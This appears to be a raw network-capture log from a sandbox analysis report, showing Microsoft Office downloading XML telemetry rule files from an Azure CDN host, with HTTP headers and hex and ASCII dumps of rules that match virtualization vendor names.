                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                86192.168.2.64982113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:03 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                x-ms-request-id: 27cd2a1a-001e-0046-1b08-17da4b000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144203Z-1657d5bbd482tlqpvyz9e93p54000000025000000000dsz4
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                87192.168.2.64982313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:03 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                x-ms-request-id: d803a4ff-401e-0083-3904-17075c000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144203Z-1657d5bbd48p2j6x2quer0q02800000002b000000000810z
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                88192.168.2.64982413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:03 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                x-ms-request-id: b0fdb72d-401e-0015-37ce-160e8d000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144203Z-1657d5bbd48p2j6x2quer0q028000000027g00000000k4rn
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                89192.168.2.64982613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:03 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 485
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                x-ms-request-id: 8d3bec0a-601e-0070-32fe-16a0c9000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144203Z-1657d5bbd482krtfgrg72dfbtn00000001s000000000m5ze
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                90192.168.2.64982713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:03 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 411
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                x-ms-request-id: 8d044b15-901e-00ac-3902-17b69e000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144203Z-1657d5bbd48xdq5dkwwugdpzr000000002fg0000000062ny
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                91192.168.2.64982813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 470
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                x-ms-request-id: e72b6989-501e-005b-2b00-17d7f7000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144204Z-1657d5bbd48tnj6wmberkg2xy80000000290000000003bvp
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                92192.168.2.64982913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                x-ms-request-id: 0377c3fc-101e-000b-65dc-165e5c000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144204Z-1657d5bbd48cpbzgkvtewk0wu0000000025000000000f65x
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                93192.168.2.64983013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 502
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                x-ms-request-id: a5e58c1d-b01e-00ab-5ac9-16dafd000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144204Z-1657d5bbd482tlqpvyz9e93p54000000028g0000000046fw
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                94192.168.2.64983113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                x-ms-request-id: 78a0432a-701e-001e-1805-17f5e6000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144204Z-1657d5bbd48p2j6x2quer0q02800000002cg000000003y8k
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:04 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
